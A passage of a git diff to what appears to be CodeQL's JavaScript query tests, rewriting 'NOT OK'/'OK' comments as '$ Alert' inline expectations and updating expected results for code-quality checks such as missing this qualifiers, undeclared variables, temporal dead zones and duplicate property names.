// $ Alert - (S) should be (x:S) } interface NumberFormatter { - format(number): string; // NOT OK: (number) should be (x:number) - (number): string; // NOT OK: (number) should be (x:number) + format(number): string; // $ Alert - (number) should be (x:number) + (number): string; // $ Alert - (number) should be (x:number) } -type TextFormatter = (NumberFormatter) => string; // NOT OK: (NumberFormatter) should be (x:NumberFormatter) +type TextFormatter = (NumberFormatter) => string; // $ Alert - (NumberFormatter) should be (x:NumberFormatter) var myGlobal : MyType; -var myCallback: (MyType) => void; // NOT OK: (MyType) should be (x:MyType) +var myCallback: (MyType) => void; // $ Alert - (MyType) should be (x:MyType) -var myOtherCallback : (x) => void; // OK: nothing indicates that 'x' is a type name. +var myOtherCallback : (x) => void; // OK - nothing indicates that 'x' is a type name. interface Repeated { x: number; } interface Repeated { y: number; } interface Repeated { z: number; } -type Callback = (Repeated) => void; // NOT OK: but should only be reported once +type Callback = (Repeated) => void; // $ Alert - but should only be reported once class C { - getName(string) { // OK: parameter name is not part of signature + getName(string) { // OK - parameter name is not part of signature return null; } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected index c9bd449006f4..60a075561957 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected @@ -1,10 +1,10 @@ | abstract-missing.ts:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | abstract-missing.ts:6:3:6:32 | abstrac ... ties(); | setAudioProperties | -| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... K\\n } | m | +| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... ;\\n } | m | | missing1.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing1.js:6:3:7:3 | setAudi ... (){\\n } | setAudioProperties | | missing2.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing2.js:7:3:8:3 | static ... (){\\n } | setAudioProperties | -| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... OK\\n } | globalFunction | -| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... OK\\n } | topNamespaceFunction | -| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... OK\\n } | childNamespaceFunction | -| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... K\\n } | globalFunction | -| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... K\\n } | globalFunction | +| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... ert\\n } | globalFunction | +| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... ert\\n } | topNamespaceFunction | +| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... ert\\n } | childNamespaceFunction | +| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... t\\n } | globalFunction | +| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... t\\n } | globalFunction | | not-ignored-by-jslint.js:4:5:4:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | not-ignored-by-jslint.js:7:3:8:3 | setAudi ... (){\\n } | setAudioProperties | diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref index 0dc32a588efb..510e68bd8977 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref @@ -1 +1,2 @@ -Declarations/MissingThisQualifier.ql \ No newline at end of file +query: Declarations/MissingThisQualifier.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts index dedc0b8c9601..a81bfd9a96d4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts @@ -1,6 +1,6 @@ abstract class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } abstract setAudioProperties(); diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js index 78e0637b1b31..7af69ca17e4d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - externs_setAudioProperties(); // OK + externs_setAudioProperties(); } externs_setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js index c8d8436ab5fe..24894c816cb1 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js index 086a8ba03c28..c55f8d03ae34 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js @@ -1,9 +1,9 @@ class X { m() { - m("default"); // OK + m("default"); } resty(...x) { - m("default"); // NOT OK + m("default"); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js index b7810e851eef..967d2ddf165b 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js index f0fa436f80b0..a7e9c39ae849 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts index 96d83d9f12ac..2000aa1b4b72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts @@ -1,39 +1,39 @@ class GlobalClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // NOT OK + topNamespaceFunction() { + topNamespaceFunction(); // $ Alert } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK + childNamespaceFunction() { + childNamespaceFunction(); // $ Alert } } namespace Top { class TopClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK, but not flagged since the namespace resolution is ignored + childNamespaceFunction() { + childNamespaceFunction(); // $ MISSING: Alert - not flagged since the namespace resolution is ignored } } } namespace Top.Child { class ChildClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // OK + childNamespaceFunction() { + childNamespaceFunction(); } } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js index e69101b80fd7..00fd5f8f67c4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js @@ -2,7 +2,7 @@ function setAudioProperties(){} class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js index 4920a96353fe..0d80afa72a8d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global NOT_setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js index e5cd1e1c3b41..559d4f3d75f8 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js index a55bb69e5965..396266bb6c72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected index f9a35141d67d..a679cb095a7c 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected @@ -1,9 +1,9 @@ -| test.js:6:7:6:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:14:7:14:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:23:2:23:2 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:54:10:54:10 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:60:6:60:6 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:66:2:66:2 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:72:9:72:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | +| test.js:5:7:5:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:12:7:12:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:20:2:20:2 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:50:10:50:10 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:55:6:55:6 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:60:2:60:2 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:66:9:66:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | | tst3.js:7:10:7:10 | x | Variable x is used like a local variable, but is missing a declaration. | | tst3.js:7:16:7:19 | rest | Variable rest is used like a local variable, but is missing a declaration. | diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref index 47259d4307ed..05c15790bd10 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref @@ -1 +1,2 @@ -Declarations/MissingVarDecl.ql \ No newline at end of file +query: Declarations/MissingVarDecl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js index 5c4444111759..77c37017ec3a 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js @@ -2,26 +2,23 @@ var x; function f(a) { var sum = 0; - // NOT OK - for (i=0; i void; // OK! This is a property, not a method, we ignore those. - constructor(): string; // NOT OK! This a called "constructor" - new(): Date; // OK! This a constructor signature. + function (): number; // OK - Highly unlikely that it is an accident when there are other named methods in the interface. + (): number; // OK - What was probably meant above. + new:() => void; // OK - This is a property, not a method, we ignore those. + constructor(): string; // $ Alert - This a called "constructor" + new(): Date; // OK - This a constructor signature. myNumber: 123; } @@ -13,15 +13,15 @@ interface MyInterface { var a : MyFunction = null as any; interface MyFunction { - function(): number; // NOT OK! + function(): number; // $ Alert } class Foo { - new(): number { // OK! Highly unlikely that a developer confuses "constructor" and "new" when both are present. + new(): number { // OK - Highly unlikely that a developer confuses "constructor" and "new" when both are present. return 123; } - constructor() { // OK! This is a constructor. + constructor() { // OK - This is a constructor. } myString = "foobar" @@ -34,18 +34,18 @@ class Foo { var b : FunctionClass = new FunctionClass(); declare class FunctionClass { - function(): number; // NOT OK: + function(): number; // $ Alert } class Baz { - new(): Baz { // OK! When there is a method body I assume the developer knows what they are doing. + new(): Baz { // OK - When there is a method body I assume the developer knows what they are doing. return null as any; } } declare class Quz { - new(): Quz; // NOT OK! The developer likely meant to write constructor. + new(): Quz; // $ Alert - The developer likely meant to write constructor. } var bla = new Foo(); diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected index 84d7d3d40fc9..3717fc460cea 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected @@ -1 +1 @@ -| tst.js:3:5:3:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:4:5:4:17 | let s = "hi"; | s | +| tst.js:2:5:2:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:3:5:3:17 | let s = "hi"; | s | diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref index 11d29c61b707..260ac43bc943 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref @@ -1 +1,2 @@ -Declarations/TemporalDeadZone.ql \ No newline at end of file +query: Declarations/TemporalDeadZone.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js index cb665103c1da..2ee068482544 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js @@ -1,27 +1,26 @@ function f() { - // NOT OK - s = null; + s = null; // $ Alert let s = "hi"; - // OK + s = "hello"; } function g() { - // OK + s = null; var s = "hi"; - // OK + s = "hello"; } function do_something() { - // OK + let foo; let foo; } function do_something() { - // OK + let foo; foo = "bar"; let foo; @@ -29,7 +28,7 @@ function do_something() { if (true) { // enter new scope, TDZ starts const func = function () { - console.log(myVar); // OK! + console.log(myVar); }; function otherfunc() { diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected index 6ecb8a664d32..8568ca6705d1 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected @@ -1 +1 @@ -| excessiveParameterList.js:4:1:4:48 | functio ... p8) {\\n} | Function func2 has too many parameters (8). | +| excessiveParameterList.js:4:1:4:59 | functio ... Alert\\n} | Function func2 has too many parameters (8). | diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref index 7f245bdda92e..00dcfc5b70a1 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref @@ -1 +1,2 @@ -Declarations/TooManyParameters.ql +query: Declarations/TooManyParameters.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js index 2ff015e35bb7..52a4302d3196 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js @@ -1,5 +1,5 @@ function func1() { } -function func2(p1, p2, p3, p4, p5, p6, p7, p8) { +function func2(p1, p2, p3, p4, p5, p6, p7, p8) { // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js index 4327b4885f59..6881d51be716 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js @@ -1,4 +1,4 @@ -// OK: overly long parameter lists in external APIs aren't the fault of the externs definitions +// OK - overly long parameter lists in external APIs aren't the fault of the externs definitions function f(a, b, c, d, e, f, g, h) {} /** @externs */ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref index a6cbbd4df634..f78c9c3afc28 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref @@ -1 +1,2 @@ -Declarations/UniqueParameterNames.ql +query: Declarations/UniqueParameterNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js index 1779be95e365..1e814fe219df 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js @@ -1,21 +1,21 @@ function f( -x, -x, // NOT OK -\u0078 // NOT OK +x, // $ Alert +x, // $ Alert +\u0078 ) { return; } this.addPropertyListener(prop.name, function(_, _, _, a) { proxy.delegate = a.dao; }); -// OK: for strict mode functions, duplicate parameter names are a syntax error +// OK - for strict mode functions, duplicate parameter names are a syntax error function f(x, y, x) { 'use strict'; } function f( x, -x // OK: empty function +x // OK - empty function ) { } -(a, a) => a + a; // OK: for strict mode functions, duplicate parameter names are a syntax error +(a, a) => a + a; // OK - for strict mode functions, duplicate parameter names are a syntax error diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref index 092a0534a249..770e337950c9 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref @@ -1 +1,2 @@ -Declarations/UniquePropertyNames.ql +query: Declarations/UniquePropertyNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js index a8a5fe4bb7b9..fe6c4a97b13b 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js @@ -17,9 +17,9 @@ var accessors = { }; var clobbering = { - x: 23, // NOT OK: clobbered by `x: 56` - y: "hello", // NOT OK: clobbered by `"y": "world"` - x: 42, // NOT OK: clobbered by `x: 56` + x: 23, // $ Alert - clobbered by `x: 56` + y: "hello", // $ Alert - clobbered by `"y": "world"` + x: 42, // $ Alert - clobbered by `x: 56` x: 56, "y": "world" } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js index 6332a235e21e..731b0525c7b8 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js @@ -7,7 +7,7 @@ var o = { setX: function(x) { this.x = x; - }, + }, // $ Alert getX: function() { return this.x; diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref index 37aba2753b2b..b419a3298903 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref @@ -1 +1,2 @@ -Declarations/UnreachableMethodOverloads.ql +query: Declarations/UnreachableMethodOverloads.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts index 9455c9a161b5..17d95f835cf7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts @@ -1,30 +1,30 @@ declare class Foobar { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert types1(): T[] - types1(): any[] // NOT OK. + types1(): any[] // $ Alert types2(): any[] - types2(): T[] // OK! + types2(): T[] types3>(t: T): number; - types3(t: T): number // OK! + types3(t: T): number on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; - on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // NOT OK. + on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // $ Alert foo(this: string): string; - foo(this: number): number; // OK + foo(this: number): number; bar(this: number): string; - bar(this: number): number; // NOT OK + bar(this: number): number; // $ Alert } declare class Base { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert overRiddenInSub(): string; overRiddenInSub(): number; @@ -49,13 +49,13 @@ interface Base2 { method(): "bar"; } -// OK. + interface MultiInheritanceI extends Base1, Base2 { method(): "foo"; method(): "bar"; } -// OK. + declare class MultiInheritanceC implements Base1, Base2 { method(): "foo"; method(): "bar"; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts index 898b246fe9f3..6ad8967fbe1f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts @@ -1,3 +1,3 @@ import {B} from './B'; -export let A: number = B+1; // NOT OK: `B` is not initialized if `B.ts` is imported first. +export let A: number = B+1; // $ Alert - `B` is not initialized if `B.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts index f22945c1f986..92cc89638297 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts @@ -2,4 +2,4 @@ import {A} from './A'; export let B: number = 100; -export let Q: number = A; // NOT OK: `A` is not initialized if `A.ts` is imported first. +export let Q: number = A; // $ Alert - `A` is not initialized if `A.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js index bc215a3b6983..a7ec4ead8979 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js @@ -2,7 +2,7 @@ import { AudioService } from './audio' import { StoreService } from './store'; export const services = [ - AudioService, + AudioService, // $ Alert StoreService ]; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref index f8f5f52dffc2..d77733eeada1 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref @@ -1 +1,2 @@ -Declarations/UnstableCyclicImport.ql +query: Declarations/UnstableCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts index fa3dfff4b500..3b9a180a68fa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts @@ -1,3 +1,3 @@ import {B} from './B'; -console.log(B) // OK: `B` does not import this file +console.log(B) // OK - `B` does not import this file diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts index 7cd3d8dc021c..6a66f26422d6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts @@ -1,4 +1,4 @@ import {B} from './exportCycleB'; export var A = 100; -export {B}; // OK: export binding does not immediately evaluate 'B' +export {B}; // OK - export binding does not immediately evaluate 'B' diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts index 75c0593f980e..057e72352b77 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts @@ -1,3 +1,3 @@ import {A} from './exportCycleA'; -export let B = () => A; // OK: `A` is not used during initialization. +export let B = () => A; // OK - `A` is not used during initialization. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts index 2627fefa0e07..538e7fb44050 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts @@ -3,5 +3,5 @@ import {B} from './safeB'; export let A = 100; export function getSum() { - return A + B; // OK: not accessed from top-level + return A + B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts index 19d7c26d1bdf..dfc1d45417a4 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts @@ -3,5 +3,5 @@ import {A} from './safeA'; export let B = 20; export function getProduct() { - return A * B; // OK: not accessed from top-level + return A * B; // OK - not accessed from top-level } diff --git 